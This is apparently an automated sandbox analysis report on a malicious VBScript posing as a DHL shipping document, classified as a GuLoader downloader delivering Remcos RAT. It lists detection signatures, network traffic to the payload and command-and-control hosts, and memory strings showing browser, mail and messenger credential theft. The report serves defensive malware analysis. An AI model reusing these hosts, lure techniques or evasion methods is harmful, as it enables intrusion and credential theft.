Windows Analysis Report
DHL Shipping Document Awb & BL.vbs

Overview

General Information

Sample name:	DHL Shipping Document Awb & BL.vbs
Analysis ID:	1465419
MD5:	af8e905368962cfb4873c41a77b4515c
SHA1:	577337de5d106e6b11225be7c362f33a8d5c0831
SHA256:	bde3493e67a6088d2d265ca765e9aba6f98cc45eb933d5f00f498ffac84711a3
Tags:	vbs
Infos:

Detection

GuLoader, Remcos

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Malicious sample detected (through community Yara rule)

VBScript performs obfuscated calls to suspicious functions

Yara detected GuLoader

Yara detected Powershell download and execute

Yara detected Remcos RAT

AI detected suspicious sample

Found suspicious powershell code related to unpacking or dynamic code loading

Hides threads from debuggers

Installs a global keyboard hook

Maps a DLL or memory area into another process

Obfuscated command line found

Potential malicious VBS script found (suspicious strings)

Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)

Sample has a suspicious name (potential lure to open the executable)

Sigma detected: Script Interpreter Execution From Suspicious Folder

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: WScript or CScript Dropper

Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes

Suspicious execution chain found

Suspicious powershell command line found

Switches to a custom stack to bypass stack traces

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Instant Messenger accounts or passwords

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Uses dynamic DNS services

Very long command line found

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Wscript starts Powershell (via cmd or directly)

Yara detected WebBrowserPassView password recovery tool

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

Contains functionality to modify clipboard data

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Direct Autorun Keys Modification

Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE

Sigma detected: Suspicious Powershell In Registry Run Keys

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Sleep loop found (likely to delay execution)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://0xmrmagnezi.github.io/malware%20analysis/RemcosRAT/ https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Signatures

AV Detection

Yara detected Remcos RAT

Source: Yara match	File source: Process Memory Space: wab.exe PID: 1712, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\kpburtts.dat, type: DROPPED

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: unknown	HTTPS traffic detected: 192.185.112.252:443 -> 192.168.2.9:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.185.112.252:443 -> 192.168.2.9:60918 version: TLS 1.2

Source:	Binary string: m.Core.pdb source: powershell.exe, 00000005.00000002.1853080836.000000000744F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1853080836.000000000744F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ystem.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1844677982.0000000002D05000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb>b source: powershell.exe, 00000005.00000002.1853080836.000000000744F000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_22B210F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	10_2_22B210F1
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_22B26580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,	10_2_22B26580
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_0040AE51 FindFirstFileW,FindNextFileW,	19_2_0040AE51
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 21_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,	21_2_00407EF8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 22_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,	22_2_00407898

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\System32\wscript.exe

Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Networking

Uses dynamic DNS services

Source: unknown

DNS query: name: janbours92harbu02.duckdns.org

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.9:60919 -> 206.123.148.194:3981

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 178.237.33.50 178.237.33.50
Source: Joe Sandbox View	IP Address: 206.123.148.194 206.123.148.194

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: M247GB M247GB

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /Nedslagnings.dwp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: contemega.com.doConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /zPwwF47.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: contemega.com.doCache-Control: no-cache

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /Nedslagnings.dwp HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: contemega.com.doConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /zPwwF47.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: contemega.com.doCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache

Source: wab.exe, 00000013.00000003.2021151072.0000000003989000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: wab.exe, 00000013.00000003.2021151072.0000000003989000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: ://192.168.2.1/all/install/setup.au3file:///C:/Windows/system32/oobe/FirstLogonAnim.htmlhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: wab.exe, 0000000A.00000002.2264296762.0000000022AF0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.1996257806.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: bhvB999.tmp.19.dr	String found in binary or memory: exp1.www.linkedin.com equals www.linkedin.com (Linkedin)
Source: bhvB999.tmp.19.dr	String found in binary or memory: exp2.www.linkedin.com equals www.linkedin.com (Linkedin)
Source: bhvB999.tmp.19.dr	String found in binary or memory: exp3.www.linkedin.com equals www.linkedin.com (Linkedin)
Source: bhvB999.tmp.19.dr	String found in binary or memory: exp4.www.linkedin.com equals www.linkedin.com (Linkedin)
Source: bhvB999.tmp.19.dr	String found in binary or memory: exp5.www.linkedin.com equals www.linkedin.com (Linkedin)
Source: wab.exe, wab.exe, 00000016.00000002.1996257806.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: wab.exe	String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: bhvB999.tmp.19.dr	String found in binary or memory: realtime.www.linkedin.com equals www.linkedin.com (Linkedin)
Source: bhvB999.tmp.19.dr	String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: bhvB999.tmp.19.dr	String found in binary or memory: www.linkedin.com0 equals www.linkedin.com (Linkedin)
Source: wab.exe, 0000000A.00000002.2264740043.0000000023370000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: wab.exe, 0000000A.00000002.2264740043.0000000023370000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000013.00000002.2021671120.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)

Source: global traffic	DNS traffic detected: DNS query: contemega.com.do
Source: global traffic	DNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
Source: global traffic	DNS traffic detected: DNS query: janbours92harbu02.duckdns.org
Source: global traffic	DNS traffic detected: DNS query: geoplugin.net

Source: bhvB999.tmp.19.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: bhvB999.tmp.19.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: bhvB999.tmp.19.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: bhvB999.tmp.19.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: bhvB999.tmp.19.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
Source: bhvB999.tmp.19.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
Source: bhvB999.tmp.19.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
Source: bhvB999.tmp.19.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: powershell.exe, 00000002.00000002.1943692775.000001379AA8C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://contemega.com.do
Source: powershell.exe, 00000005.00000002.1853080836.000000000744F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: bhvB999.tmp.19.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: bhvB999.tmp.19.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: bhvB999.tmp.19.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhvB999.tmp.19.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: bhvB999.tmp.19.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl0
Source: bhvB999.tmp.19.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG3.crl07
Source: bhvB999.tmp.19.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: bhvB999.tmp.19.dr	String found in binary or memory: http://crl3.digicert.com/DigicertSHA2SecureServerCA-1.crl0?
Source: bhvB999.tmp.19.dr	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: bhvB999.tmp.19.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: bhvB999.tmp.19.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhvB999.tmp.19.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG3.crl0
Source: bhvB999.tmp.19.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: bhvB999.tmp.19.dr	String found in binary or memory: http://crl4.digicert.com/DigicertSHA2SecureServerCA-1.crl0
Source: wab.exe, 0000000A.00000002.2246278943.0000000000579000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp
Source: powershell.exe, 00000002.00000002.2065998160.00000137B12D5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://microsoft.co
Source: powershell.exe, 00000002.00000002.2047294756.00000137A8D23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1847892998.00000000058E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: bhvB999.tmp.19.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: bhvB999.tmp.19.dr	String found in binary or memory: http://ocsp.digicert.com0:
Source: bhvB999.tmp.19.dr	String found in binary or memory: http://ocsp.digicert.com0H
Source: bhvB999.tmp.19.dr	String found in binary or memory: http://ocsp.digicert.com0I
Source: bhvB999.tmp.19.dr	String found in binary or memory: http://ocsp.msocsp.com0
Source: bhvB999.tmp.19.dr	String found in binary or memory: http://ocsp.msocsp.com0S
Source: powershell.exe, 00000005.00000002.1845384623.00000000049D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1943692775.0000013798CB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1845384623.0000000004881000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.1845384623.00000000049D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: bhvB999.tmp.19.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: bhvB999.tmp.19.dr	String found in binary or memory: http://www.digicert.com/CPS0~
Source: wab.exe, wab.exe, 00000016.00000002.1996257806.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.ebuddy.com
Source: wab.exe, wab.exe, 00000016.00000002.1996776338.000000000334D000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000016.00000002.1996257806.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.com
Source: wab.exe, 00000016.00000002.1996776338.000000000334D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.imvu.coma
Source: wab.exe, 0000000A.00000002.2264296762.0000000022AF0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.1996257806.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
Source: wab.exe, 0000000A.00000002.2264296762.0000000022AF0000.00000040.10000000.00040000.00000000.sdmp, wab.exe, 00000016.00000002.1996257806.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.imvu.comr
Source: wab.exe, 00000013.00000002.2021961381.0000000003293000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net
Source: wab.exe, 00000016.00000002.1996257806.0000000000400000.00000040.80000000.00040000.00000000.sdmp	String found in binary or memory: http://www.nirsoft.net/
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://M365CDN.nel.measure.office.net/api/report?FrontEnd=VerizonCDNWorldWide&DesusertionEndpoint=P
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaot
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingaotak
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingrms
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=bingth
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://aefd.nelreports.net/api/report?cat=wsb
Source: powershell.exe, 00000002.00000002.1943692775.0000013798CB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000005.00000002.1845384623.0000000004881000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://config.edge.skype.com/config/v1/ODSP_Sync_Client/19.043.0304.0013?UpdateRing=Prod&OS=Win&OSV
Source: powershell.exe, 00000002.00000002.1943692775.000001379AA2E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.Pb)m
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.c
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.co
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.d
Source: powershell.exe, 00000002.00000002.1943692775.0000013798ED5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1943692775.000001379AA2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.2246278943.000000000051A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/N
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Ne
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Ned
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Neds
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Nedsl
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Nedsla
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Nedslag
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Nedslagn
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Nedslagni
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Nedslagnin
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Nedslagning
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Nedslagnings
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Nedslagnings.
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Nedslagnings.d
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Nedslagnings.dw
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1845384623.00000000049D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/Nedslagnings.dwp
Source: wab.exe, 0000000A.00000002.2246278943.000000000051A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/zPwwF47.bin
Source: wab.exe, 0000000A.00000002.2261933839.0000000022470000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://contemega.com.do/zPwwF47.binOptjsLanmoviesmacktalk.com/zPwwF47.bin
Source: powershell.exe, 00000005.00000002.1847892998.00000000058E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000005.00000002.1847892998.00000000058E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000005.00000002.1847892998.00000000058E9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DesusertionEndpoint=Edge-Prod-LAX31r5b&
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://ecs.nel.measure.office.net?TenantId=ODSP_Sync_Client&DesusertionEndpoint=Edge-Prod-LAX31r5c&
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://edd27623571fc427dc1f8d6ba04dd39f.clo.footprintdns.com/apc/trans.gif?b37f6b94dfddf29d58d90046
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://fp.msedge.net/conf/v2/asgw/fpconfig.min.json?monitorId=asgw
Source: powershell.exe, 00000005.00000002.1845384623.00000000049D5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: wab.exe, 00000013.00000003.2001386225.000000000398B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: wab.exe	String found in binary or memory: https://login.yahoo.com/config/login
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://logincdn.msauth.net/16.000/Converged_v22057_4HqSCTf5FFStBMz0_eIqyA2.css
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://logincdn.msauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en-gb_RP-iR89BipE4i7ZOq
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_tSc0Su-bb7Jt0QVuF6v9Cg2.js
Source: bhvB999.tmp.19.dr	String found in binary or memory: https://logincdn.msauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://moviesmacktalk.c
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://moviesmacktalk.co
Source: powershell.exe, 00000002.00000002.1943692775.0000013799F19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://moviesmacktalk.com
